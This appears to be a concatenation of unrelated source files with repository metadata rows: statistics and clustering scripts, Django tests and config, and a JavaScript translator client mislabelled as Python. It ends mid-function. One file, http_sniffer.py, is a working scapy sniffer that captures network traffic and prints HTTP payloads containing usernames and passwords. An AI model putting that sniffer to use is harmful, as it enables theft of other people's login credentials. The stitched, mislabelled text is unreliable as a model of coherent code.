test3 = [[3, 3, 3, 3, 3, 3], [6, 6, 2, 2, 2, 2], [4, 4, 4, 4, 0, 0], [5, 5, 5, 1, 1, 1]]
# Expected result -1
print(find_the_best_dice(test3)) | [
"tuan8101@gmail.com"
] | tuan8101@gmail.com |
e7ac1d8c71f70a2ebee9d88a3804542fdc12abc1 | d594f3926f6379ef7c382c608cb211f507240420 | /csunplugged/tests/classic/management/test_loadclassicpages_command.py | 7a33734206fe1f6e5621b4183a0ba25918999801 | [
"LicenseRef-scancode-secret-labs-2011",
"MIT",
"OFL-1.1",
"LGPL-2.0-or-later",
"AGPL-3.0-only",
"CC-BY-4.0",
"Apache-2.0",
"BSD-3-Clause",
"CC-BY-SA-4.0",
"LicenseRef-scancode-public-domain",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | uccser/cs-unplugged | 0b9151f84dd490d5b90771a3706327a623d39edc | 363e281ff17cefdef0ec61078b1718eef2eaf71a | refs/heads/develop | 2023-08-25T08:45:29.833025 | 2023-08-22T02:58:35 | 2023-08-22T02:58:35 | 66,315,075 | 200 | 41 | MIT | 2023-09-14T02:15:40 | 2016-08-22T23:16:40 | Python | UTF-8 | Python | false | false | 698 | py | """Module for the testing custom Django loadclassicpages commands."""
from unittest import mock
from tests.BaseTestWithDB import BaseTestWithDB
from django.core import management
from django.test import tag
@tag("management")
class LoadClassicPagesCommandTest(BaseTestWithDB):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.language = "en"
@mock.patch(
"classic.management.commands._ClassicPagesLoader.ClassicPagesLoader.load",
return_value=True
)
def test_loadclassicpages_command(self, classic_pages_loader):
management.call_command("loadclassicpages")
self.assertTrue(classic_pages_loader.called)
| [
"jackmorgannz@gmail.com"
] | jackmorgannz@gmail.com |
051c053b73a14b7fad3a06b450de5056cf8a044c | 16385e10f6ad05b8147517daf2f40dbdda02617c | /site-packages/cs.web-15.3.0.6-py2.7.egg/cs/web/components/static/react/__init__.py | 90e19c2b4dcc68a2577b0068f52d34e7587580fb | [] | no_license | prachipainuly-rbei/devops-poc | 308d6cab02c14ffd23a0998ff88d9ed0420f513a | 6bc932c67bc8d93b873838ae6d9fb8d33c72234d | refs/heads/master | 2020-04-18T01:26:10.152844 | 2019-02-01T12:25:19 | 2019-02-01T12:25:19 | 167,118,611 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 324 | py | #!/usr/bin/env python
# -*- mode: python; coding: utf-8 -*-
#
# Copyright (C) 1990 - 2016 CONTACT Software GmbH
# All rights reserved.
# http://www.contact.de/
#
"""
"""
__docformat__ = "restructuredtext en"
__revision__ = "$Id: __init__.py 161953 2017-07-20 12:55:37Z yzh $"
from . import v15_6_1
__all__ = ["v15_6_1"]
| [
"PPR4COB@rbeigcn.com"
] | PPR4COB@rbeigcn.com |
32dc1c88a380742ad5859299a1edd666250cb48c | 594d954fb5552bfd7a4cbf975813e0134e5dc9fa | /Problems/Vowels and consonants/main.py | 8d1301179e0e485f94fac12ab6cfcee26ec9bec8 | [] | no_license | dhanin/Hangman | c21987bb0c7b2a3968d53d3aee398ac3850c55f0 | 83c3c128be0ca21b8b8e02def7f13f5f3b70f52f | refs/heads/master | 2023-03-22T01:51:54.030523 | 2021-03-18T16:31:57 | 2021-03-18T16:31:57 | 349,144,714 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 148 | py | string = input()
for ch in string:
if not ch.isalpha():
break
else:
print("vowel") if ch in "aeiou" else print("consonant")
| [
"php_th@yahoo.com"
] | php_th@yahoo.com |
ff0e88f34eb6938840ec84f1427cc15edb606eef | 36d269be264a99ebfd95139a5f949663c588c96a | /sniffer/sniffer/http_sniffer.py | f4fdcb2ba6bf65fa71db3659070e5241e4059c2c | [] | no_license | chulman/packet-sniffer | 0fc2e82539cf4ff115b70ced859f102304f5c68a | a3ee086a4f93bbf245cf0a774e3cf5d5f570269d | refs/heads/master | 2020-04-20T13:06:13.672813 | 2019-02-23T13:45:34 | 2019-02-23T13:45:34 | 168,860,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,923 | py | import hexdump
import scapy.all as scapy
from scapy_http import http
from datetime import datetime
import json
from collections import OrderedDict
from django_redis import get_redis_connection
from django.core.cache import cache
import argparse
def get_arguments():
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--interface", dest="interface", help="Interface name")
options = parser.parse_args()
return options
# scapy_http 패키지의 http.HTTPRequest 메소드를 사용하여 HTTP 레이어의 패키지 만 필터링.
# http://Host/ ... Path
def get_url(packet):
return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path
def get_credentials(packet):
if packet.haslayer(scapy.Raw):
load = packet[scapy.Raw].load
keywords = ["login", "password", "username", "user", "pass"]
for keyword in keywords:
if keyword in load:
return load
def process_packets(packet):
date=datetime.today().strftime("%Y/%m/%d-%H:%M:%S")
hex_packet = hexdump.hexdump(bytes(packet),'return')
group_data = OrderedDict()
group_data["date"] = date
group_data["packet"] = str(packet)
json_data=json.dumps(group_data, ensure_ascii=False, indent="\t")
# redis, connection pool, redis save
con = get_redis_connection("default")
con.expire(date,60*10)
con.lpush(date,json_data)
if packet.haslayer(http.HTTPRequest):
url = get_url(packet)
print("[+] Http Request >> " + url)
credentials = get_credentials(packet)
if credentials:
print("[+] Possible username/passowrd" + credentials + "\n\n")
# iface : network interface.
# store : store result in memory.
# prn : function name.
def sniff_packet(interface):
scapy.sniff(iface=interface, store=False, prn=process_packets)
# options = get_arguments()
# sniff_packet(options.interface)
| [
"chlcjfals0122@gmail.com"
] | chlcjfals0122@gmail.com |
ccd8344a9f13bb3a798f2065a30bd0d715bb5bb0 | 7d1c3551a44cb940fab63a808f953e807f5b2a28 | /tradeNappApi/wsgi.py | 5c17b9303b7469097cf62dfc475d47a3d11d9782 | [] | no_license | GayathriRaja/tradeNappApi | 356515c2d9c382aaadae8cfd1102239046b2f13f | 90bd0f59566d6ebacf1db1c1834455ffe7a2d849 | refs/heads/master | 2022-12-29T06:03:26.854219 | 2020-09-30T14:24:18 | 2020-09-30T14:24:18 | 299,532,436 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | """
WSGI config for tradeNappApi project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'tradeNappApi.settings')
application = get_wsgi_application()
| [
"gayathrraja@gmail.com"
] | gayathrraja@gmail.com |
3aff4072976515670e34f948342becfa4c2b18e7 | 2bdedcda705f6dcf45a1e9a090377f892bcb58bb | /src/main/output/group_morning/school/study/parent.py | 7e99ab840ff28cb6a18c2c4e39a3c3281a2a0f69 | [] | no_license | matkosoric/GenericNameTesting | 860a22af1098dda9ea9e24a1fc681bb728aa2d69 | 03f4a38229c28bc6d83258e5a84fce4b189d5f00 | refs/heads/master | 2021-01-08T22:35:20.022350 | 2020-02-21T11:28:21 | 2020-02-21T11:28:21 | 242,123,053 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,730 | py | var express = require('express');
let https = require ('https');
let body = '';
let subscriptionKey = 'b53239afba713a1cdd73ee9877849c8c';
let host = 'api.microsofttranslator.com';
let path = '/V2/Http.svc/TranslateArray';
let target = 'en';
let params = '';
let ns = "http://schemas.microsoft.com/2003/10/Serialization/Arrays";
let content =
'<TranslateArrayRequest>\n' +
// NOTE: AppId is required, but it can be empty because we are sending the Ocp-Apim-Subscription-Key header.
' <AppId />\n' +
' <Texts>\n' +
' <string xmlns=\"' + ns + '\">돼지</string>\n' +
' <string xmlns=\"' + ns + '\">소고기</string>\n' +
' <string xmlns=\"' + ns + '\">닭고기</string>\n' +
' <string xmlns=\"' + ns + '\">같은 제조시설</string>\n' +
' </Texts>\n' +
' <To>' + target + '</To>\n' +
'</TranslateArrayRequest>\n';
module.exports.Translate = async function() {
GetTranslationsArray();
}
let GetTranslationsArray = function () {
let request_params = {
method : 'POST',
hostname : host,
path : path + params,
headers : {
'Content-Type' : 'text/xml',
'f5d83a0fd0bdf404234022afe41fc65d' : subscriptionKey,
}
};
let req = https.request (request_params, response_handler);
req.write (content);
req.end ();
}
let response_handler = function (response) {
response.on ('data', function (d) {
body += d;
});
response.on ('end', function () {
console.log ('[[[[[[end]]]]]]' + body);
return body;
});
response.on ('error', function (e) {
console.log ('Error: ' + e.message);
});
};
/*
let response_handler = function (response) {
let body = '';
response.on ('data', function (d) {
body += d;
});
response.on ('end', function () {
console.log (body);
});
response.on ('error', function (e) {
console.log ('Error: ' + e.message);
});
};
module.exports.Translate = function(){
// Replace the subscriptionKey string value with your valid subscription key.
let host = 'api.microsofttranslator.com';
let path = '/V2/Http.svc/Translate';
//let from = 'unk';from=' + from + '
let target = 'en';
let text = '안녕. 좋은 아침입니다.';
let params = '?to=' + target + '&text=' + encodeURI(text);
let request_params = {
method : 'GET',
hostname : host,
path : path + params,
headers : {
'9d68e3c6ee03aa3badea4b764596a363' : subscriptionKey,
}
};
let req = https.request (request_params, response_handler);
req.end ();
console.log(req);
return req;
};
*/
| [
"soric.matko@gmail.com"
] | soric.matko@gmail.com |
d180c9a0488339e766e7d36b3df378032e8065f1 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02970/s808061498.py | 84c4907d1b62a518823b275a00f596abd485e54d | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 123 | py | N, D = map(int, input().split())
if N % (2*D+1) == 0:
ans = N // (2*D+1)
else:
ans = (N // (2*D+1))+1
print(ans)
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
9d6e15952bf0ebce83bc403f916e3f4a0fe4cb14 | 5c783f40027536bf04a54fddd4545f06c122b62b | /contents/models.py | b7212b3566e4cb3e62f06c1c9d4c1733649a859a | [] | no_license | stuartelimu/sb-intranet | ab45d54e1f7b72a3d1cb27b7db666fca1b43fa3c | af4a2e929397188a1bee9bd26de0468857b4cd4f | refs/heads/master | 2023-01-22T17:00:52.597000 | 2020-11-19T05:51:20 | 2020-11-19T05:51:20 | 263,233,850 | 0 | 1 | null | 2020-11-19T05:53:14 | 2020-05-12T04:39:53 | HTML | UTF-8 | Python | false | false | 680 | py | from django.db import models
from tinymce import HTMLField
class Category(models.Model):
title = models.CharField(max_length=120)
def __str__(self):
return self.title
class Meta:
verbose_name_plural = 'Categories'
class Activity(models.Model):
title = models.CharField(max_length=120)
description = HTMLField()
steps = HTMLField(blank=True)
def __str__(self):
return self.title
class Meta:
verbose_name_plural = 'Activities'
class TicketType(models.Model):
title = models.CharField(max_length=120)
content = HTMLField()
def __str__(self):
return self.title
class Meta:
pass | [
"stuartelimu@gmail.com"
] | stuartelimu@gmail.com |
163eed9f3ba8509d389a8ddf80630b111e1adc2a | 0d98c690d1d966f953443b0e7ddc007611b8f1b2 | /one_way_anova.py | f6bda915b5caddd618b0d4c9b571b18ea15e1691 | [] | no_license | ianzur/asarco_el_paso | 8c7b71ab447edc89539bb39ad115a637eb3c2b7b | 26a76c27a6c2cc0e9c1241d717cd9b5420e1086e | refs/heads/master | 2022-11-23T15:49:05.168274 | 2020-07-23T20:50:40 | 2020-07-23T20:50:40 | 282,051,521 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,265 | py | """
Are the average blood lead levels different between children based on the radius (miles) of the smelter where they spent the first two years of their life in 1972? In 1973?
Ho: proximity to the smelter during the first two years of life has NO effect on the mean blood lead level (mu_1 = mu_2)
Ha: proximity to the smelter during the first two years of life has an increases the mean blood lead level
SPSS:
ONEWAY /VARIABLES= Lead_72 Lead_73 BY FST2YRS
/STATISTICS=DESCRIPTIVES HOMOGENEITY.
"""
from pathlib import Path
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import scipy.stats
# customize plot styling
# https://matplotlib.org/3.2.2/tutorials/introductory/customizing.html
plt.style.use('seaborn-deep')
DATA_PATH = Path("../4. EL PASO DATA.sav")
def main():
el_paso_data = pd.read_spss(str(DATA_PATH))
el_paso_data = el_paso_data.rename(
columns={
'FST2YRS': "lived first 2 years within 1 mile of ASARCO",
'Lead_72': "1972 Blood Lead Level (ug / 100mL)",
'Lead_73': "1973 Blood Lead Level (ug / 100mL)",
}
)
# create boolean mask
first_2_years = el_paso_data['lived first 2 years within 1 mile of ASARCO'] == 'Yes'
# 1972
bll_1972 = el_paso_data["1972 Blood Lead Level (ug / 100mL)"]
print(scipy.stats.f_oneway(bll_1972[first_2_years].dropna(), bll_1972[~first_2_years].dropna()))
# 1973
bll_1973 = el_paso_data["1973 Blood Lead Level (ug / 100mL)"]
print(scipy.stats.f_oneway(bll_1973[first_2_years].dropna(), bll_1973[~first_2_years].dropna()))
mean_near_72 = bll_1972[first_2_years].mean()
mean_far_72 = bll_1972[~first_2_years].mean()
mean_near_73 = bll_1973[first_2_years].mean()
mean_far_73 = bll_1973[~first_2_years].mean()
plot_df = pd.DataFrame(
{
'1972': {'within 1 mile': mean_near_72, 'outside 1 mile': mean_far_72} ,
'1973': {'within 1 mile': mean_near_73, 'outside 1 mile': mean_far_73},
},
).unstack().rename('average blood lead levels ug/dL').sort_index(level=1)
plot_df.index = [' '.join(col).strip() for col in plot_df.index.values]
plot_df.plot(style='D-', rot=8)
plt.show()
if __name__=="__main__":
main()
| [
"noreply@github.com"
] | ianzur.noreply@github.com |
198ea75f7e5b3646278f8c47370b37ac4214a246 | 13ea4e6f59b1f87302dfa32d2c911263dfe9814f | /server.py | eb40eae9209cffec0e1d59018a58cfabdd89cf98 | [] | no_license | ozirno/PyClientServer-Demo | 07333771160d53ef33d1ab7d087e1ec310303f13 | f2068915408c1b1cce0ae0ab188d07143364d75f | refs/heads/master | 2021-04-12T08:13:23.057505 | 2016-09-25T19:29:55 | 2016-09-25T19:29:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 971 | py | import sys
import socket
import signal
connected = False
def signal_handler(signal, frame):
global connection
global connected
print('\nExiting')
if (connected):
connection.close()
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bind the socket to the port
server_address = ('localhost', 10000)
print >>sys.stderr, 'starting up on %s port %s' % server_address
sock.bind(server_address)
# Listen for incoming connections
sock.listen(1)
# Wait for a connection
print >>sys.stderr, 'waiting for a connection'
connection, client_address = sock.accept()
connected = True
print >>sys.stderr, 'connected'
print >>sys.stderr, 'connection from', client_address
while connected:
# Receive the data in small chunks and retransmit it
data = connection.recv(1024)
if data:
print >>sys.stderr, '(SERVER): received "%s"' % data
connection.sendall(data)
| [
"arembedded@gmail.com"
] | arembedded@gmail.com |
d64b781daefef1110feddb5e2744a760069ebee6 | 4b459b254a7b77bdbaec250de7e2094dc0c97dec | /KmeansClustering.py | 0ad9a7e8e64b51cca8edb956a0f16a69f45e19da | [] | no_license | VirajDeshwal/KMeans-Clustering | a2fcbad5f48b9a455b9caaa67338287d55de2baa | d2bec00187208650e87976aeab6b0316397f4faa | refs/heads/master | 2021-09-03T15:24:20.690833 | 2018-01-10T04:37:30 | 2018-01-10T04:37:30 | 116,908,492 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,094 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 9 19:22:40 2018
@author: virajdeshwal
"""
print('Lets begin with the Kmeans Clustering.\n')
#intake = input('Press any key to continue....\n\n')
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
file = pd.read_csv('Mall_Customers.csv')
X = file.iloc[:,[3,4]].values
'''to find the optimal clusters use Elbow method... remove these comments and use the beolw code to check the elbow graph
# Now lets use the Elbow method to define the optioal number of clusters
#metric for clusters
wcss = []
from sklearn.cluster import KMeans
#for loop to check the clusters from 1 to 10
for i in range(1,11):
#intialization of the model
kmeans = KMeans(n_clusters=3, init='k-means++', n_init=10, max_iter=300, random_state=0)
#fitting the kmeans to the independent variables
#Now lets calculate the centroid of the cluster
wcss.append(kmeans.inertia_)
plt.plot(range(1,11),wcss)
plt.title('The Elbow Method')
plt.xlabel('Numbers of Clusters')
plt.ylabel('WCSS')
plt.show()'''
'''Now as we got the idea from the elbow graph about the optimal no. of clusters.
we will take the 5 clusters for our dataset.'''
#applying k-means to the dataset
from sklearn.cluster import KMeans
kmeans = KMeans(n_clusters=5, init='k-means++', n_init=10, max_iter=300, random_state=0)
y_means =kmeans.fit_predict(X)
plt.scatter(X[y_means==0,0], X[y_means==0,1], s=100, c='red', label = 'Careful pals')
plt.scatter(X[y_means==1,0], X[y_means==1,1], s=100, c='blue', label = 'average')
plt.scatter(X[y_means==2,0], X[y_means==2,1], s=100, c='green', label = 'Targets')
plt.scatter(X[y_means==3,0], X[y_means==3,1], s=100, c='magenta', label = 'Freak')
plt.scatter(X[y_means==4,0], X[y_means==4,1], s=100, c='cyan', label = 'Sensible')
plt.scatter(kmeans.cluster_centers_[:,0], kmeans.cluster_centers_[:,1], s=300, c='yellow', label = 'Centroids')
plt.title('clusters of client')
plt.xlabel('Annual Income(K$)')
plt.ylabel('Spending Score (1-100)')
plt.legend()
plt.show()
print('\nDone ;)')
| [
"viraj.deshwal@outlook.com"
] | viraj.deshwal@outlook.com |
d48ef93a9e163544fdfbe6db1328052df56d5cb7 | 4fad774a1a687a77f3f2e095622053d114201f51 | /src/codeposter_images.py | 2b994016e3c2ab8146797009c09cb40b5ef2820d | [] | no_license | jhumphry/tilings | 350892544f02c94d15d731a0ad7b33cb675c418f | b8524ab6b82c23834add7f0c77824e5f6bc3fd81 | refs/heads/master | 2020-09-15T16:04:59.464225 | 2019-11-23T09:15:47 | 2019-11-23T09:15:47 | 223,497,821 | 0 | 0 | null | 2019-11-22T22:38:10 | 2019-11-22T22:38:09 | null | UTF-8 | Python | false | false | 1,022 | py | import os
import random
import sys
from vector3 import Vector3, random_norm1
from tiling3 import Tiling3
target_dir = "posters/codeimages"
def unit_ball():
random.seed("A seed to keep the pattern consistent.")
z = Vector3(0,0,0)
v = dict((random_norm1(), None) for i in range(80))
e = dict((frozenset([x,z]), None) for x in v)
v[z] = None
t = Tiling3(v, e, {}, {}).translate(Vector3(0,0,2))
with open(os.path.join(target_dir, "unit_ball.eps"), 'w') as f:
geobox = (0.1, 2.8, -0.6, 1.8)
psbox = (0, 0, 200, 200)
edgecol = lambda x: random.choice([(1,0,0), (0,1,0), (0,0,1)])
t.write_eps(f, psbox, geobox, edgecol=edgecol, whiterange=3.0)
if __name__=="__main__":
a = sys.argv[1:]
if not a:
print("Run with the names of the files to generate")
exit()
if not os.path.exists(target_dir):
os.makedirs(target_dir)
for n in a:
n = n.split("/")[-1].split(".")[0]
if n=="unit_ball":
unit_ball()
| [
"cranch@cantab.net"
] | cranch@cantab.net |
bf9a99c1fbd4e7d74fba7c31b418178d0eeb5143 | 3c66373d07ced2bc8eff0f49d9848169f332e191 | /directory_sso_api_client/__init__.py | a0ddb16219cd47ebd5559f956b0182aa8ef68993 | [
"MIT"
] | permissive | uktrade/directory-sso-api-client | 174c51307e90b02663b7f1f57a168f0695b4a26a | f93d552527d0cfff948cccc9c5c32293924693b1 | refs/heads/master | 2023-07-22T11:40:05.866044 | 2023-07-06T09:13:31 | 2023-07-06T09:13:31 | 72,042,961 | 0 | 1 | MIT | 2023-07-06T09:13:33 | 2016-10-26T20:45:44 | Python | UTF-8 | Python | false | false | 89 | py | from directory_sso_api_client.client import sso_api_client
__all__ = ['sso_api_client']
| [
"rikatee@gmail.com"
] | rikatee@gmail.com |
a12137297210e2a7150057ab063356d001721283 | d7744325ebf3963874f924d8474003ba13eccc78 | /openstack_sdk/tests/compute/test_host_aggregate.py | 347db1b835d9bd6875cda671e9d0fac13c153b5b | [] | no_license | cloudify-incubator/cloudify-openstacksdk-plugin | 5fc80c0438eaf2c05833b6795ef1ce3bfb18bea8 | cdc5f80d8c597d78c80577191538ade1cf7238de | refs/heads/master | 2021-07-14T16:04:54.253530 | 2020-06-22T12:17:55 | 2020-06-22T12:17:55 | 155,547,727 | 1 | 0 | null | 2020-06-15T12:09:28 | 2018-10-31T11:40:20 | Python | UTF-8 | Python | false | false | 5,078 | py | # #######
# Copyright (c) 2019 Cloudify Platform Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Standard imports
import mock
# Third party imports
import openstack.compute.v2.aggregate
# Local imports
from openstack_sdk.tests import base
from openstack_sdk.resources import compute
class HostAggregateTestCase(base.OpenStackSDKTestBase):
def setUp(self):
super(HostAggregateTestCase, self).setUp()
self.fake_client =\
self.generate_fake_openstack_connection('host_aggregate')
self.host_aggregate_instance = compute.OpenstackHostAggregate(
client_config=self.client_config,
logger=mock.MagicMock()
)
self.host_aggregate_instance.connection = self.connection
def test_get_host_aggregate(self):
aggregate = openstack.compute.v2.aggregate.Aggregate(**{
'id': 'a34b5509-c122-4c2f-823e-884bb559afe8',
'name': 'test_aggregate',
'availability_zone': 'test_availability_zone',
})
self.host_aggregate_instance.name = 'test_aggregate'
self.host_aggregate_instance.id = \
'a34b5509-c122-4c2f-823e-884bb559afe8'
self.fake_client.get_aggregate = mock.MagicMock(return_value=aggregate)
response = self.host_aggregate_instance.get()
self.assertEqual(response.id, 'a34b5509-c122-4c2f-823e-884bb559afe8')
self.assertEqual(response.name, 'test_aggregate')
def test_list_aggregates(self):
aggregate_list = [
openstack.compute.v2.aggregate.Aggregate(**{
'id': 'a34b5509-c122-4c2f-823e-884bb559afe8',
'name': 'test_aggregate_1',
'availability_zone': 'test_availability_zone_1',
}),
openstack.compute.v2.aggregate.Aggregate(**{
'id': 'a44b5509-c122-4c2f-823e-884bb559afe8',
'name': 'test_aggregate_2',
'availability_zone': 'test_availability_zone_2',
}),
]
self.fake_client.aggregates = \
mock.MagicMock(return_value=aggregate_list)
response = self.host_aggregate_instance.list()
self.assertEqual(len(response), 2)
def test_create_aggregate(self):
config = {
'name': 'test_aggregate',
'availability_zone': 'test_availability_zone',
}
aggregate = {
'id': 'a34b5509-c122-4c2f-823e-884bb559afe8',
'name': 'test_aggregate',
'availability_zone': 'test_availability_zone',
}
self.host_aggregate_instance.config = config
new_res = openstack.compute.v2.aggregate.Aggregate(**aggregate)
self.fake_client.create_aggregate = \
mock.MagicMock(return_value=new_res)
response = self.host_aggregate_instance.create()
self.assertEqual(response.name, config['name'])
def test_update_aggregate(self):
old_aggregate = openstack.compute.v2.aggregate.Aggregate(**{
'id': 'a34b5509-c122-4c2f-823e-884bb559afe8',
'name': 'test_aggregate',
'availability_zone': 'test_availability_zone',
})
new_config = {
'name': 'update_test_aggregate',
}
new_aggregate = openstack.compute.v2.aggregate.Aggregate(**{
'id': 'a34b5509-c122-4c2f-823e-884bb559afe8',
'name': 'update_test_aggregate',
'availability_zone': 'test_availability_zone',
})
self.host_aggregate_instance.resource_id = \
'a34b5509-c122-4c2f-823e-884bb559afe8'
self.fake_client.get_aggregate = \
mock.MagicMock(return_value=old_aggregate)
self.fake_client.update_aggregate =\
mock.MagicMock(return_value=new_aggregate)
response = self.host_aggregate_instance.update(new_config=new_config)
self.assertNotEqual(response.name, old_aggregate.name)
def test_delete_server(self):
aggregate = openstack.compute.v2.aggregate.Aggregate(**{
'id': 'a34b5509-c122-4c2f-823e-884bb559afe8',
'name': 'test_aggregate',
'availability_zone': 'test_availability_zone',
})
self.host_aggregate_instance.resource_id = \
'a34b5509-c122-4c2f-823e-884bb559afe8'
self.fake_client.get_aggregate = mock.MagicMock(return_value=aggregate)
self.fake_client.delete_aggregate = mock.MagicMock(return_value=None)
response = self.host_aggregate_instance.delete()
self.assertIsNone(response)
| [
"mohammeda@cloudify.co"
] | mohammeda@cloudify.co |
10d61f06d704d646df9442f624733c2ca3254ec4 | cbf967d1359e2d284a2d9acb39dc28cb363d6f1d | /backend/course/api/v1/viewsets.py | cd5e653768a7b3c797677ce2388856d66c087a6e | [] | no_license | crowdbotics-apps/ceh-trainer-19190 | 1eaed7e7dabff24aa10fda0f41ebc98c6237c254 | 4ed128efe6cebada48196a8be05343355f5dce9f | refs/heads/master | 2022-11-20T15:53:34.774222 | 2020-07-26T11:51:10 | 2020-07-26T11:51:10 | 282,638,774 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,400 | py | from rest_framework import authentication
from course.models import (
Recording,
Event,
Subscription,
Course,
Group,
Module,
PaymentMethod,
SubscriptionType,
Enrollment,
Lesson,
Category,
)
from .serializers import (
RecordingSerializer,
EventSerializer,
SubscriptionSerializer,
CourseSerializer,
GroupSerializer,
ModuleSerializer,
PaymentMethodSerializer,
SubscriptionTypeSerializer,
EnrollmentSerializer,
LessonSerializer,
CategorySerializer,
)
from rest_framework import viewsets
class EventViewSet(viewsets.ModelViewSet):
serializer_class = EventSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = Event.objects.all()
class ModuleViewSet(viewsets.ModelViewSet):
serializer_class = ModuleSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = Module.objects.all()
class CourseViewSet(viewsets.ModelViewSet):
serializer_class = CourseSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = Course.objects.all()
class CategoryViewSet(viewsets.ModelViewSet):
serializer_class = CategorySerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = Category.objects.all()
class GroupViewSet(viewsets.ModelViewSet):
serializer_class = GroupSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = Group.objects.all()
class LessonViewSet(viewsets.ModelViewSet):
serializer_class = LessonSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = Lesson.objects.all()
class EnrollmentViewSet(viewsets.ModelViewSet):
serializer_class = EnrollmentSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = Enrollment.objects.all()
class PaymentMethodViewSet(viewsets.ModelViewSet):
serializer_class = PaymentMethodSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = PaymentMethod.objects.all()
class SubscriptionTypeViewSet(viewsets.ModelViewSet):
serializer_class = SubscriptionTypeSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = SubscriptionType.objects.all()
class SubscriptionViewSet(viewsets.ModelViewSet):
serializer_class = SubscriptionSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = Subscription.objects.all()
class RecordingViewSet(viewsets.ModelViewSet):
serializer_class = RecordingSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = Recording.objects.all()
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
adc2754dfd54adf3e35acefd3fd83a06c74b18e0 | 87dcd590e7174c30a4caca1039966d6659cb0f29 | /count.py | 320c3e411b38dd90944f5587b3357d0657bfcc8d | [
"Unlicense"
] | permissive | mecroby/test_pi_learning | 8ad1cde9dd9e4e707863ccb865722122d8dd6a07 | 5e32b768968b523445578f8dc33dd720930c72e7 | refs/heads/master | 2021-07-14T09:11:08.719483 | 2017-10-18T20:23:50 | 2017-10-18T20:23:50 | 107,400,372 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 172 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Oct 14 14:48:25 2017
@author: roby
"""
import sys
count=0
for line in sys.stdin:
count +=1
print count
| [
"noreply@github.com"
] | mecroby.noreply@github.com |
5f5c70b276a12bb5f83506928706a4162ca598d4 | abbc11abfabb0d3976789a9ec073b28892c78778 | /bias_classifier/classifier_all.py | c3bdb57855da671e2e85b26f5d47dd0e150137c6 | [] | no_license | sunxhap/machine_learning | b06b28b3aba5b39704d8a3ae282f366dad6af406 | ef1d80a16fd35f03e428ac27b9b0f771f6f1edbb | refs/heads/master | 2022-05-01T15:22:07.314221 | 2017-11-12T09:12:30 | 2017-11-12T09:12:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,915 | py | # -*- coding: utf-8 -*-
"""
@Time: 2017/11/8 13:42
@Author: sunxiang
"""
import csv
import random
import math
def loadCsv(filename):
lines = csv.reader(open(filename, "rb"))
dataset = list(lines)
for i in range(len(dataset)):
# 有0 的情况
temp_list = list()
for x in dataset[i]:
if x == 0 or x == '0':
x = 0.1
temp_list.append(float(x))
dataset[i] = temp_list
# dataset[i] = [float(x) for x in dataset[i]]
return dataset
def splitDataset(dataset, splitRatio):
trainSize = int(len(dataset) * splitRatio)
trainSet = []
copy = list(dataset)
while len(trainSet) < trainSize:
index = random.randrange(len(copy))
trainSet.append(copy.pop(index))
return [trainSet, copy]
def separateByClass(dataset):
separated = {}
for i in range(len(dataset)):
vector = dataset[i]
if (vector[-1] not in separated):
separated[vector[-1]] = []
separated[vector[-1]].append(vector)
return separated
def mean(numbers):
return sum(numbers) / float(len(numbers))
def stdev(numbers):
